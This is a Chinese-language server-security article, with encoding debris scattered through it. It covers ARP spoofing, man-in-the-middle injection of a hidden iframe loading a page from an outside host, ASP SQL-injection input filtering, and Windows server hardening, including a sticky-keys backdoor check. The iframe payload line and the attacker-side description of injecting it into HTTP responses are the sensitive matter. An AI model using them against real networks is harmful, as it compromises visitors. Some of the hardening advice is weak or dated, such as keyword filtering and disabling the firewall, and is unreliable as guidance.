什么是arp
地址解析協(xié)議(address resolution protocol����,arp)是在僅知道主機的ip地址時確定其物理地址的一種協(xié)議�����。因ipv4和以太網(wǎng)的廣泛應用�����,其主要用作將ip地址翻譯為以太網(wǎng)的mac地址�,但其也能在atm和fddiip網(wǎng)絡中使用��。從ip地址到物理地址的映射有兩種方式:表格方式和非表格方式�。arp具體說來就是將網(wǎng)絡層(ip層�����,也就是相當于osi的第三層)地址解析為數(shù)據(jù)連接層(mac層�����,也就是相當于osi的第二層)的mac地址。
假設:
計算機a的ip為192.168.1.1,mac地址為00-11-22-33-44-01;
計算機b的ip為192.168.1.2,mac地址為00-11-22-33-44-02;
arp工作原理如下:
在tcp/ip協(xié)議中,a給b發(fā)送ip包,在包頭中需要填寫b的ip為目標地址,但這個ip包在以太網(wǎng)上傳輸?shù)臅r候,還需要進行一次以太包的封裝,在這個以太包中,目標地址就是b的mac地址.
計算機a是如何得知b的mac地址的呢�?解決問題的關鍵就在于arp協(xié)議。
在a不知道b的mac地址的情況下,a就廣播一個arp請求包,請求包中填有b的ip(192.168.1.2),以太網(wǎng)中的所有計算機都會接收這個請求,而正常的情況下只有b會給出arp應答包,包中就填充上了b的mac地址,并回復給a。
a得到arp應答后,將b的mac地址放入本機緩存,便于下次使用�。
本機mac緩存是有生存期的,生存期結束后,將再次重復上面的過程�。
arp協(xié)議并不只在發(fā)送了arp請求才接收arp應答����。當計算機接收到arp應答數(shù)據(jù)包的時候,就會對本地的arp緩存進行更新�����,將應答中的ip和mac地址存儲在arp緩存中��。因此�����,當局域網(wǎng)中的某臺機器b向a發(fā)送一個自己偽造的arp應答,而如果這個應答是b冒充c偽造來的,即ip地址為c的ip���,而mac地址是偽造的,則當a接收到b偽造的arp應答后,就會更新本地的arp緩存,這樣在a看來c的ip地址沒有變���,而它的mac地址已經(jīng)不是原來那個了。由于局域網(wǎng)的網(wǎng)絡流通不是根據(jù)ip地址進行,而是按照mac地址進行傳輸���。所以,那個偽造出來的mac地址在a上被改變成一個不存在的mac地址,這樣就會造成網(wǎng)絡不通�,導致a不能ping通c�����!這就是一個簡單的arp欺騙。
應用
在網(wǎng)絡執(zhí)法官中,要想限制某臺機器上網(wǎng),只要點擊"網(wǎng)卡"菜單中的"權限",選擇指定的網(wǎng)卡號或在用戶列表中點擊該網(wǎng)卡所在行,從右鍵菜單中選擇"權限"�,在彈出的對話框中即可限制該用戶的權限���。對于未登記網(wǎng)卡��,可以這樣限定其上線:只要設定好所有已知用戶(登記)后����,將網(wǎng)卡的默認權限改為禁止上線即可阻止所有未知的網(wǎng)卡上線。使用這兩個功能就可限制用戶上網(wǎng)。其原理是通過arp欺騙發(fā)給被攻擊的電腦一個假的網(wǎng)關ip地址對應的mac,使其找不到網(wǎng)關真正的mac地址�����,這樣就可以禁止其上網(wǎng)。
防御
arp欺騙可以導致目標計算機與網(wǎng)關通信失敗
更可怕的是會導致通信重定向,所有的數(shù)據(jù)都會通過攻擊者的機器,因此存在極大的安全隱患��。
基與pc到pc的ip-mac雙向綁定可以解決arp欺騙
但是對于不支持ip-mac雙向綁定的設備
就需要用可以綁定端口-mac的交換來預防arp欺騙
另外�,windows 2ksp4 xpsp1 的arp-s綁定是無效的
需要升級到 2ksp5 或 xpsp2
網(wǎng)頁掛馬原理
不管是訪問服務器上的任何網(wǎng)頁,就連404的頁面也會在<html>后加入:
<iframe src=http://www.aaaa.com/a.htm width =1 height=1 frameborder=0></iframe>;,掛馬的位置在html標記左右,上面這段惡意代碼,它會每隔幾秒加入代碼���,也就是說在輸出具體的東西之前就被掛了,有時有有時又沒有,不是網(wǎng)頁源代碼問題���,也沒有在網(wǎng)頁源代碼中加入惡意代碼,即使重裝服務器,格式化重分區(qū)過第一個硬盤���,放上去網(wǎng)站沒多久一樣再會出現(xiàn)這種情況.
首先就排除了網(wǎng)站被入侵的可能,因為首頁能加在那個位置只能是 title的地方,用js控制也不大可能.然后去看了php.ini的設置也沒有任何的異常,而且這個插入的代碼有的時候出現(xiàn)有的時候不出現(xiàn),說明不是網(wǎng)站的問題了.打開同服務器的其他網(wǎng)站也有這個情況發(fā)生,而且狀況一一樣.檢查并且搜索掛馬的關鍵字之后確定不是網(wǎng)站程序的問題.
那么剩下的要么是iis自己出了問題,要么是網(wǎng)絡的問題,因為數(shù)據(jù)是處理沒有問題(這個由程序輸出,而且即使是html都會出問題),經(jīng)過一個一個排查,最后基本可以確定就是arp欺騙欺騙數(shù)據(jù)報走向,然后中間人修改一些定義的關鍵字.因為是網(wǎng)絡層次有問題(所以重做系統(tǒng)是沒有用的).
目的:通過arp欺騙來直接掛馬
優(yōu)點:可以直接通過arp欺騙來掛馬.
通常的arp欺騙的攻擊方式是在同一vlan下,控制一臺主機來監(jiān)聽密碼,或者結合ssh中間人攻擊來監(jiān)聽ssh1的密碼
但這樣存在局限性:1.管理員經(jīng)常不登陸,那么要很久才能監(jiān)聽到密碼
2.目標主機只開放了80端口,和一個管理端口,且80上只有靜態(tài)頁面,那么很難利用.而管理端口,如果是3389終端,或者是ssh2,那么非常難監(jiān)聽到密碼.
優(yōu)點:1.可以不用獲得目標主機的權限就可以直接在上面掛馬
2.非常隱蔽,不改動任何目標主機的頁面或者是配置,在網(wǎng)絡傳輸?shù)倪^程中間直接插入掛馬的語句.
3.可以最大化的利用arp欺騙,從而只要獲取一臺同一vlan下主機的控制權,就可以最大化戰(zhàn)果.
原理:arp中間人攻擊,實際上相當于做了一次代理。
正常時候: a---->b ,a是訪問的正常客戶,b是要攻擊的服務器,c是被我們控制的主機
arp中間人攻擊時候: a---->c---->b b---->c---->a
實際上,c在這里做了一次代理的作用
那么http請求發(fā)過來的時候,c判斷下是哪個客戶端發(fā)過來的包,轉發(fā)給b,然后b返回http響應的時候,在http響應包中,插入一段掛馬的代碼,比如 <iframe>...之類,再將修改過的包返回的正常的客戶a,就起到了一個掛馬的作用.在這個過程中,b是沒有任何感覺的,直接攻擊的是正常的客戶a,如果a是管理員或者是目標單位,就直接掛上馬了.
防御專題
最簡單的辦法就一命令ok��,實現(xiàn)與網(wǎng)關綁定���,比如網(wǎng)關是 192.168.0.1 比如網(wǎng)關mac 00-00-00-00-00���,好了我們直接用記事本保存代碼為 arp -s 192.168.0.1 00-00-00-00-00 然后保存�����,改拓展名為bat 加入到服務器啟動項����,目前arp攻擊猖獗���,arp的目前為一的完美解決方案就是實現(xiàn) 本機與網(wǎng)關的雙向綁定���。所謂arp防火墻���,只是起到暫時保護的作用��,以上方法可以有效的防止服務器被人arp掛馬
sql漏洞專題
簡單一點:
對于int型的參數(shù),如文章的id等�,可以先判斷是不是整數(shù)���。
id =trim(request("id"))
if id<>"" then
if not isnumeric(id) then
response.write"請?zhí)峁?shù)字型參數(shù)"
response.end
end if
id = clng(id)
else
response.write"請輸入?yún)?shù)id"
response.end
end if
這樣的話���,明小子系列就無法注入了����。
也可以控制 "'"號輸入就行了,再控制一些 sql 關鍵字的這樣更安全
比如
id=trim(request("id"))
if instr(id,"'")>0 or instr(id,"insert")>0 then
response.write "對不起,請不要注入本站"
response.end
end if
提醒大家����,sql只要打完必補丁,最重要的是��,千萬別設置什么sa/123456 sa/123 sa/sa之類的弱口令���,現(xiàn)在的小黑太多了����,動不動就是全網(wǎng)段掃描1433弱口令,在次提醒大家�,千萬別設置弱口令��。基本服務器就安全(小黑是進不來的�,高手嘛�����,說不準了�����,反正高手也不會動你的東西)
服務器安全之后門篇
我們今天主要講解2003服務器
最常見的問題����,服務器一般都開3389 4899等�����,在次提醒大家�����,弱口令問題���,現(xiàn)在什么小黑都有�����,千萬別設置什么123 123456之類,修改3389 4899端口 建議停止微軟的防火墻�,直接在網(wǎng)上����,開放需要的端口���。系統(tǒng)補丁�����,我想不用說,肯定要打的。也可采用國外的一款軟件 黑冰(號稱世界排第三����,本人以前用過����,感覺也就那樣�����,不過確實不錯)
本地安全策略設置密碼強度���,然后刪出系統(tǒng)默認管理員��,修改管理組,別留什么adminisrators 呵呵,不允許建立帳戶��,嘿嘿����,絕吧。
服務器殺毒軟件必備����!推薦使用麥咖啡����。上次進了一批服務器���,發(fā)現(xiàn)全是用麥咖啡(連聯(lián)眾的計費服務器�,baidu的有一個服務器也是)���,設置ok基本百毒不侵(服務器好的建議使用���,呵呵就可以防止什么鴿子啊���,黑洞啊��,紅娘啊之類的東西裝上了)��。
在次說明請大家檢查自己的服務器登陸3389界面,別輸入密碼��,先按5次shift�����,看看��,如果彈出c盤��,或cmd 或則一個密碼窗口,呵呵恭喜你,你的服務器被人玩了,小弟可幫大家解決,這個后門被譽為windows最強悍后門。不需要密碼驗證��,直接得到shell�����。
